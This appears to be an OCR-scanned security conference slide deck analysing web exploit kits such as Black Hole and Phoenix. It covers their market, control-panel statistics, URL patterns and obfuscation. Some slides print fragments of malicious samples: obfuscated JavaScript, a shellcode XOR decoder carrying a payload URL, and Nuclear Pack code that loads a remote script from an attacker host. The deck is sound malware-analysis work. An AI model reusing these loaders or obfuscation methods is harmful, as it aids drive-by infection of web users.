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ENTERPRISE SECURITY 




Who Am I? 


• Team Lead, ASI 

• Malware Analysis 

• IP Reputation 

• Malicious content harvesting 




Web Exploit Kits Are... 


Pre-packaged software that consists of 

• Installers (usually) 

• Typically PHP-based 

• Number of Exploits 

• Rarely 0-day 

• Control Panel 

• Installer 

• Statistics 

• Configuration 

• Install malicious payload 

• Botnet 

• Trojan 

• Fake AV 
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Exploit Kit Economy 


• Cost up to thousands of dollars 

• Rentals also offered on daily/weekly/monthly basis 

• Bullet-proof hosting options 

• Contain “EULA”-like agreements 

• Marketing & competitiveness between kits 

• Regularly issue updates 
- Bug-fixes 

-Exploit reliability updates 
-Aesthetic changes 



Active Exploit Kits 



* Image courtesy of Kahu Security 
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How Exploit Kits Typically Work 



Exploit Kit Server 



Black Hole Exploit Kit 




What is Black Hole Exploit Kit? 


• Launched in late 2010 

• Currently most popular exploit kit 

• Version 1.2.3 

• Contains many recent Java exploits 

• Contains exploit for CVE-2012-1889 (MS XML) 

-0-day at the time 

• Good JavaScript obfuscation 
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Black Hole in the News 
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USPS website hit by Blackhole Exploit Kit 

by Steve Ragan - Apr 8 2011, 02:05 
Researchers at Zscaler have uncovered a Blackhole Kit 
attack carried out against the U.S. Postal Service's 
Rapid Information Bulletin Board System (RIBBS). This 
is the second Blackhole Kit attack discovered this week, 
after another was spotted on the website for the 
Houston International Film Festival on Monday. 


USGCB Audit with 
SAINT vulnerability scanner 
from SAINT Corporation 

youtube.com/samtexploit 


AdCnoioes 


The Blackhole Kit, which was developed in Russia, cost 
about $1,500 USD annually for anyone who wants to 
deploy it, with discounts for six-month usage and 
quarterly usage. Described as being powerful, the kit 
that target vulnerabilities in Java and Adobe PDF. Upgrades to the 

developers add more obfuscation and encryption to 
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Black Hole Events in 2011 
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Black Hole Spam Campaigns 

• Spam is easy 

• Target users with 
-Fake delivery notices 
-Fake IRS notices 

-Fake orders from online retailers 

• User clicks the link 

-Owned! 
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Black Hole Control Panel 



STATISTIC 


TOTAL INFO 

450216 hited 148233 hosts 



14 . 61 % 

18997 LOADS LOADS 


TODAY INFO 12 . 74 % 

21899 hited 8663 hosts 978 loads A loads 


EXPLOITS 

^ Java Rhino > 
PDF LIBTIFF > 
PDF ALL > 

^ Java OBE > 
HCP > 

FLASH > 
MDAC > 


OS 

HITS 

HOSTS 

LOADS t 


_ n 

BROWSERS 1 

Windows 7 

228122 

81851 

9227 

12.50 


Chrome > 

Windows XP 

107502 

34616 

5607 

19.06 


fc Firefox > 

O Windows Vista 

88850 

30063 

4303 

16.04 • 


0 MSIE > 

ft Windows 2003 

538 

105 

27 

27.55 • 


fs Moz*a > 

Windows 2000 

368 

70 

9 

13.24 • 


Q Opera > 

JB WindowsNT 

178 

47 

3 

8.82 •» 


0 Safari > 

$ Windows 98 

24 

17 

3 

17.65 m 



^ Linux 

7773 

1259 

1 

0.19 • 


COUNTRIES 

Mac OS 

16845 

2862 

0 

0.00 


ra Portugal 


I | Italy 


THREADS 1 

HITS 

HOSTS 

LOADS 

<H> 

_ □ 

Norway 

default > 

369 

88 

0 

0.00 

HI United States 

PT.DOR > 

319647 

40022 

6927 

25.47 • 

US Iceland 

PT_DIGITAL > 

87724 

79502 

8088 

10.18 » 

M Poland 

NO > 

7707 

6590 

2335 

39.08 

™ Netherlands 

IT_bukfcry > 

17774 

11304 

708 

6.27 

• Japan 

> 

16988 

14730 

1057 

12.14 9 

H Germany 


rj China 

United Kingdom 
1—■ Czech Republic 
£3 Sweden 
0*1 Canada 
II Romania 
Other 


*lmage courtesy of XylitOI 
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Black Hole Control Panel (cont.) 


EXPLOITS 



<M> TOTAL 

EXPLOITS 

LOADS 

<N> t 


m 83.36 

Java Rhino v 

16145 

83.36 

mm 


Windows 7 

8844 

54.31 



Windows XP 

4314 




Windows Vista 

3031 




Windows 2003 

23 




Windows 2000 

8 




Windows NT 

3 




Linux 

1 



9.93 

^ PDF LIBTIFF - 

1923 

9.93 • 



Windows Vista 

385 




Windows XP 

588 




Windows 7 

356 

18.43 

— 


Windows 2003 

5 



m 2.57 

^ PDF ALL - 

497 

2.57 • 



Windows XP 

330 




Windows Vista 

31 

18.24 



Windows 7 

17 




Windows 2003 

1 



9 1.89 

^ JavaOBE - 

366 

1.89 • 



Windows Vista 

230 




Windows XP 

87 




Windows 7 

46 




Windows 38 

3 



1.16 

HCP - 

225 

1.16 • 



Windows XP 

225 




Windows 7 

2 



0.64 

FLASH - 

124 

0.64 • 



Windows XP 

123 




Windows 7 

1 



m 0.45 

^ MDAC v 

87 

0.45 • 



Windows XP 

86 

38.85 



Windows 2000 

1 




X 


*lmage courtesy of XylitOI 
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Black Hole Control Panel (cont.) 



*lmage courtesy of XylitOI 
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Black Hole Exploit URL Schemes 


• Predictable 

• Typically ending in .php 

-Main.php and showthread.php most common 

• One URL parameter 

-Normally 1-5 characters 

-Value is 16 valid hex characters 

• Malware payload URL normally w.php 
-3 parameters 
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Black Hole JavaScript Obfuscation 


• Changes a lot 

• Typically consists of 

-Text blob in HTML tag or parameter 
-Deobfuscation routine 

• Loads malicious Frame for bulletproof site 

-More obfuscated JavaScript 
-Detects browser/plugin versions 
-Launches exploit to load malware 
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Black Hole JavaScript 

nter><hl>FLease wait page is Loading...</' 
function(b){return typeof b!="undefined") 
unction(b){return typeof b=="number"},isS 
b)?(d.isDefined(c)?new RegExp(c):d.getNun 
s(h,f)}c=h.split(e.splitNumRegx);b=f.splj 
n(b,c){var d=this,a,e;if ( Id.isStrNum(b) H 
>c| | ! (/\d/).test(e[a])){e[a]="0"}>return 
gth;e++){if(/[*\s]/.test(f[e])&&(c=navigc 
?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigat 
est(RegExp.leftContext+RegExp.rightConte> 
d,j=e.isString(k)?[k]:k;for(d=0;d<j.lengt 
ion:function(f,b){var h=this,e,d,g,a,c=-1 
=h.formatNum(b);d=b.split(h.splitNumRegx) 
XObject,getAXO:function(a){var f=null,d,t 
(h.length>0&&!g[h]){g[h]=g[a](g);delete c 
ify){c.verify.$=c};c.OS=100;if(b){var f,c 
]&&new RegExp(d[f1,"i").test(b)){c.0S=d[1 
,10):null;c.ActiveXEnabled=false;if (c. is] 
sxml2.DOMDocument","Microsoft.XMLDOM","Sh 
ue;break}}c.head=c.isDefined(document.get 
:\s*((\.\,\d]+)/i).test(i)?RegExp.$1:"0 .i 
1):null;c.isOpera=(/Opera\s*[\/J?\s*(\d+N 
,10):null;c.addWinEvent("load",c.handler! 

.replace(/\s/g,"");a=b[c];if(!a||la.getVc 
on=a.version0=a.getVersionDone=null;a.$=t 
ength<=0)&&c.isFunc(b[0])))){a.push!b)}}, 

)?c.lenath:-!:if(!(a<=0)&&b.isFunc!c 101)) 


Obfuscation (cont.) 


for(k=a.length-1;k>=0;k—){ 

if(window.document)try{dshsdfh.a 
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Black Hole PDF Obfuscation 


• Slightly different obfuscation than JavaScript 

• ASCII Character replacement 
- &#00097 for “a” 

-Still uses giant text blobs 
-Characters separated by ‘@@@’ 

• Once deobfuscated follows the same pattern as 
JavaScript in HTML 
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Black Hole JavaScript Shellcode 


• Most exhibits the same behavior 

-Standard JMP / CALL to obtain address 
- Patches bytes of shellcode using XOR with 0x28 
-VOILA! Junk ASM code now valid 
-URL now visible near the end of the shellcode 
-Easily detected by many shellcode detection libs 


1:000001AO db 70h ; p 

> s 000001A1 aHttpWwwappslMy db * http://wwwappsl-myups.com/t.php?f«6d4b0&e-l ' ,0 
1:000001CD db 0 

i ♦ nfifinm m «r>rrnnn r*nH<s 
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Black Hole JavaScript Shellcode (cont.) 


JUJUU 


inc ecx 


30001 

30002 

30003 

30004 

30008 

30009 

3000B } - 

3000B 

3000B loc B: 

3000B 

3000C 

3000E 

30013 

30013 IOC 13 i 
30013 

30016 

30017 

30019 

3001B } - 

300 IB 

3001b loc lB: 
3001B 

30020 

30020 shellcode: 

30020 

30022 

30024 


inc 

OCX 

inc 

ecx 

inc 

ecx 

and 

sp r OFFFCh 

cld 


jmp 

short loc lB 


; CODE XREF: segOOO:loc lBjp 

pop cax 

xor ccx , ccx 

sab cx r 0FE52h ; get number of bytes to patch 

J CODE XREF! BCgOOO*000000174j 
xor byte ptr [cax], 28h ; XOR shellcode bytes with 0x28 

inc eax| 

loop loc 13 

jmp short shellcode 


call 

loc B 

; CODE XREF: segOOO:00000009Tj 

tost 

esp, esp 

; CODE XREF: segOOO:00000019Tj 

jna 

short loc 58 



UUU4 


ami 

—sp, UFFFCn- 



0008 


cld 




0009 

000B 


jmp 

short loc 1 b 



1 





000B 

ooob 

000B 

dcobf sc: 

pop 

sax 

• 

r 

c< 

oooc 


xor 

ecx, ecx 



00 0E 
0013 
0013 

loc 13t 

sub 

cx r 0FE49h 

* 

O 

0013 


xor 

byte ptr [eaxi. 

28h 

0016 


inc 

eax 



0017 

0019 


loop 

loc_13 



0019 

0019 

loc_19! 

jmp 

short shellcode 

f 

D 

001B 

• __ _ _ 





i 





001B 

001B 

loc IB! 



* 

C< 

001B 

0020 


call 

dcobf sc 

• 

f 

ji 

0020 

0020 

shellcode: 

lodsd 


• 

F 

C< 

0021 


int 

3 

} 

T; 

0022 


pop 

ebp 



0023 


sbb 

alp Oclh ; * * 



0025 


ja 

short loc 42 
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Phoenix Exploit Kit History 

• Started in 2007 

• Current version 3.1 

• Offers full and mini versions 

-Mini version only allows one affiliate 
-Full allows for multiple 

• Tracks visitors, only launches exploit once per IP 

• Large number of exploits available 
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Phoenix Exploit Kit Statistics 


c ©■ 


.php7go=advanced_statistics 




jjfPkoenix Exploit's Kit 

ICORDIA, INTEGRfTAS, INDU STRIA... 3.1 full 


^CONCORDIA, INTEGRfTAS, INDU STRIA... 

Operation systems statistics 


Advanced browsers statistics 


os 

Visits Exploited 

Percent 

Browser 

Visits Exploited 

Perce 

Other 

■ 

■ 


Other 

a 

i 

B% 

Windows XP SP2 

a 

i 

m% 

MSIE v6.0 

a 

■ 


Windows XP 

■ 

i 

_■% 

MSIE v7.0 

■ | 

■ 

su c 

Windows 7 

i 

s 

a% 

Firefbx vll.O 

■ 

! 

_% 

Windows 

a 

i 

% 

Firefbx v9.0.1 

■ 

S 

s% 

Linux 

■ 

■ 

i% 

Opera v9.80 

■ 

1 


Windows 98 

■ 

■ 

i% 

Safari 

m 

1 

■% 

Windows Vista 

■ 

■ 

i% 

MSIE v8.0 

a 

1 

i% 

Windows 95 

l 

■ 

i% 

MSIE V4.01 

a 

1 

i% 





MSIE V7.01 

i 

1 

i% 





Firefbx v3.6.9 

■ 

1 

i% 





Opera 

i 

■ 

■% 





Firefbx vl.5.0 

i 

1 

■% 





Firefbx v3.0.9 

i 

■ 

i% 





Firefbx V3.6.28 

i 

■ 

■% 





MSIE v5.0 

i 

■ 

i% 





Opera v9.64 

i 

1 

i% 


Menu 

Simple statistics 
Advanced statistics 
Countries statistics 
Referers statistics 
Sources statistics 
Clear statistics 
Upload .exe 
Exit 




‘Image courtesy of XylitOI 
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Phoenix Exploit Kit Exploit Statistics 


C ©■ 


.php? 





Image courtesy of XylitOI 
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PEK JavaScript Obfuscation 


• Uses multiple <script> tags 
-2 <script> tags 
-<textarea> tag 

-Final <script> tag 

• Deobfuscated code still not obvious 

• No 

“getShellcode” routine 
“heap spray” references 
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PEK Obfuscated JavaScript 

+'.replace(pripuh,ssat ) .replace(ialabola,huivnos ) ;}</script><script>var etcwxw6="vhbba3t 
sl2so2has7bba8j hv3hvivahsfssohxfsdj hsshrovbj sfdfshjbodhessawobs j sfbh=j j b'shfndd j j bbhkf j h4j bxNhqb2bj a 
bedKsbqJdj vDj hhBfbjWbshJ j hhHhd j KfshBda3B 1 bvB;h41fvg2uhhBnsj4cfa5thhHirgJoj hBnfsF~bdKDehJEwvHTj dAEhvS 
j hHAhdJVhbBAxsH( bjW) ahB{saUvbdYadbYrqhB~vsBvhjHej aBrhblshdHij j BohhEn3aB;vbDt4dDrghAyhwN{ j 7Sva6Bah2Hr 
t JMdfQshhV~vsW=ddH-vbBdsh4oasHchbJudfBmbhHes j Bnj qHthbJ.aj BgdhJebf lthj HEsh2lj FBeaJDmbHAedABnj HAthGABa 
BdhJX(wHB'7DHd6Fhe2Jbp3Hjl4ShotVsyfFbJhUf asYj vdRhabFsPhUdlsYbubRfgfHjihFhnj Jb'qVj ) bFh. j Hwj hAbvfVrmj C 
^JGbeHA4rAD3sHV2iGShoSFbnVHj~FBh=JHa~HBsVDHxMFJ j sJHh.HhbgSbdeVj j tFj h(Uba0Yfs ) Rgb.Fd j vUj heYhd rRdbsHf j 
Vj j ;Ffb>HdwcAheaVhbtDf j cFhhhHhb^Ghs ( AhheD3d ) V7s{S6afFlbuH2hnB7vcH8htB3siHvfoJfhnHhr~hd j tbsfej vbs j fet 
shidbbnj ffghj j Adshcfdhtbbxigfbvj j aefhsXdbb(hj dvhhqefbvrhshshdj ihj hohfhr*3bj )7j h{6h3vlfva2d4r7 1 g~8;ho3 
hehcgcdthtsisNvodaf nhmh'-vedMd~sDv=bAs~fCa' j ( hJs)dad{bvbvsaf ajWj rheh->-abbpdSj~bth=hab~srsdj tdoa. j cbifi 
nhnasftbtd.da'chi;rwlfe7eua6dnt2.ce3'tE4^ilt+oef^nmhv~eseDndrEtbsT(hiE'soCobnTbf~Pjh+Dej'“Fcq'(tb. ) ' j 
rpj iy .hf{sF-veJ ( atH!rAAA~tHcltGtvrSi=iVvPbFeduJXftHOleDb. ( FjG'JeeiHctdStV' V) e, F{ rpUrs ) Yei;RtopFun.Ur 
tHf; AFavtJlatVsrrFe'-iH; fbA}iuVt=tDr/eFyE(H{S 'GrccAerlDtiaVupsSrtsFn=ihMdB(['Hn A ,Be,'Hw]cJ~+lHA)she, 
j vvBbeaDfXr9gO~6dbfCj j i5hef5dc=6ft/-b(A6goc5j brAf j o3deF-hcolht rlfNmDha=0hm(-he(9h) A 83~,37!]A6=+-l-)6 
l;03ll4v)vFf;fCh}=2dcl9savEvt.3fcm6hha'd~t )s( c;behtfx( rj cfysei{dpfvbt ) af i [r j ol~hnj qb) .-j {s=hrp~belps 
( rfn'eb*“.aj f'tha)efl;Odslb’evj ; ;=ed}lco}vtci. ( ufm'm~ame(tsntcxtehm. s( Iwtf2rUi. is)Xti [MenlL(g]H'A.T<c 
'dvi,yet *>X(bl 1 vo. ) ad7;ry.s~>0vr<’=~0)p=B)a~J{rpEvs.CeeCTrlr~sneiitado(t=nleP~vOd=[bf~0j 1 '] 
a7l(m.v'e0=S='phP;aed}rlfesllle.~sIAhenpe'»tpii(Igflih~vct ( .a=t j t0eoi~siowtnniU('ds', ti ''hn)'=g) ) 0A;; 
ifrav=~sepssXa~i(r=d's~=lepc.I.l6nCs. t ri0(ed’la: ) vtC)feA{.08vj bAeoj 9rie7snc8i(t0o'(-n''2~)a8=)d0~;oC 
16 ( sC. ltF0vr-'=eA;=a2}7m4el' D10, -s ) '4e{ '4~S)4iH; 5f0t5~Wr3( Py5tD{4eFs0s ( . 0t' t0Uey0ssp>ige<nt'»/gg=O/ 
;EiiqCvl.Teco>Xtp<(2e''.n~lp(+.d'~5fG'.'Eo0)Tb';' j )>,e)e'c{lhtvst~eetcr~plsi:aif/so~/sn(li'“(8d=(8=^s 
l.=0s56.i. ) 9d018:' | .C; (lA>s3Fev2El=/Es=pFe7hA~)/Ci)d-f&fnD^gE( (5Ctl.7evp-s<h0t7p0Ul?0sli0i)=-n)10g{5 
tOf-iWaAvPlBeDsCXFeD( () E ' ';FleqF.s.E4gsD.teC2gnB’ndA) k( ' )t)~{i; 'vls-ec.+rtO'»s2p' i. eiopndnd(=~f ) '=’;c 
>Wl.ero4liy. st J2eea'{ ( v;Mqa>D.P}ArltCeur(sgy ) pi{;onv}n'a>s~rcew~aBimtodacdt j hyho~)=r(;'~ev0=)a'~{r-p 
'-isC=ge(~hI ) 'tn; .=t>/' (>/0vf. 'eu.>rn/ , sc/~itf+oii'“nol' .ne<s~.'pSe-lhlx+iOe^tW’' (P;/'Ds' .F.~' (S+)fa~[r 
b) voj;aFevrica'-ltrpe l ^'(Mn=t+i~,~nd2'oo)>rc; '--us )=m. j-eCwnlaetorr. s^scesir ( ooe)sna;a. t}vsecipEasllt 
(e(o'nes_t ) s' (m>) ' {s[i}olftg]rrs;ay=im{'fern-'. j()skm; h4ipeNn.l2oslJ reeK)txN{AeKmtcJituDnrtBoieWrb (J 
e;Bp ( >Ba'cBrsalsrt2eccBI'h4n, ( 5t~eH(f ) Jmn~Bi){Fn;}Kop}J r.cH)saA;etS}tcNeAhDlt ( HsteJer)B{i~Hmb{Wiu>Br 
EY~'TB=wEB~iCH0dTB; t Jl}hAHi'VBf,AE--MB(0)D( ) ;Dm;vAapaNj.rSos~BreuH~taE=AhH=taJ~thQ6raV)ihW~baH&uhB&t 
3 ( ' hBmhaHie;BnivHogaJ rhrB~t~J>' sl=, oH'—s210aB9) vD); iA'-psBSi. oA&ssA-esH( toJmAsBitsXntoBorlHrikh~bab<us 
2(obi'sf ) f=j ) r'h)ans{mj dJekbAb4fVoNjAr2hSdJbKeKjYrNhL'Kwl,JbN~DrE'Bh(0Wj ) 'Jb; ) Hb>;K4edB3loB2scBheult 
r»4aTt5sE.HxCbJjToBhPdFbDyKdF.J j( aHh)pAa;pSs}eNb}nDjcdHhaCJdthBbciHj hlWb^dBq( ( Uj epYb) ) Yw{;BeD>BbEvHjl 



PEK PDF Obfuscation 


• Resembles Black Hole JS obfuscation 

• Large array of integers 

• Run through deobfuscation routine, launch exploit 

• Deobfuscation routine simpler than Black Hole 

36 flar hui=12/utml; 

37 > 

38 

39 catch( v32vrw) 

40 { 

41 

42 i=0; 

43 while(i!=3937) 

44 { 

45 s=s+a[b[i]]; 

46 i=l+i; 

47 > 

48 k=s; 

49 e(k); 

50 > 
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Other Exploit Kits 


/ 






Lots of New Kits 


• Large number of new kits in 2012 

• Multiple kits have popped up from China 

• Many more popping up from Eastern Europe 

• Some kits pop-up and then disappear 

• Too many to keep up with! 
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Yang Pack 


• Surfaced in late 2011 / early 2012 

• Based out of China 

• 3 exploits, very low detection rates 

• Like many kits from China 
-No PHPfiles 

-No database backend 
-Consist only of static HTML files 



32 


Sweet Orange Exploit Kit 

• Surfaced in 2012 

• Aims to keep small footprint 

• Authors only give information to established 
cybercriminals 

• Costs $2500 

• Rents for $1400 

• Observed in the wild? 



33 


Sweet Orange Exploit Kit (cont.) 



*lmage courtesy of Webroot / Dancho Danchev 
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Sweet Orange Exploit Kit (cont.) 
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Nuclear Pack v2 

• Been dormant for a few years 

• Resurfaced in 2012 with 4 exploits 

• Introduced anti-honeyclient feature 

-Difficult to automate collection of exploits 
-More interactive honeyclients/sandbox required 
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Nuclear Pack Anti-Crawling 


4333 (tunctionU { 

4334 var url = &#39; http&#58; //smmxkycxsu.webhop. org/g/&#39; ; 

4335 if (typeof window.xyzflag === &#39;undefined&#39; ) { 

4336 window.xyzflag = 0; 

4337 > 

4338 document.onmousemove = functionO { 

4339 if (window.xyzflag === 0) { 

4340 window.xyzflag = 1; 

4341 var head = document. getElementsByTagName(&#39;head&#39; )&#91;0&#93; ; 

4342 var script = document. createElement(&#39;script&#39; ); 

4343 script.type = &#39; text/javasc ript&#39 ; ; 

4344 script.onreadystatechange = function () { 

4345 if (this.readyState == &#39;complete&#39; ) { 

4346 window.xyzflag = 2; 

4347 > 

4348 >; 

4349 script.onload = functionO { 

4350 window.xyzflag = 2; 

4351 >; 

4352 script.src = url + Math.random().toString().substring(3) + &#39;.js&#39 

4353 head.appendChild(script); 

4354 > 

4355 >; 
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Conclusion 

• Exploit kits are only getting more 
sophisticated 

-Newer exploits 

-Changing evasions / obfuscations 

-This is a business for the authors, they are 
invested in staying one-step ahead to make 
money 

• Detecting new techniques takes work 

• Patch Java! 
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Many Thanks to... 

• Marc Eisenbarth, Joanna Burkey 

• Alen Puzic, Mike Dausin, Jen Lake 

• Jorge Mieres, Steven K/XylitOI, Mila, 
Dancho Danchev, SpiderLabs guys, Kahu 
Security 



39 


THANK YOU 


QUESTIONS? 


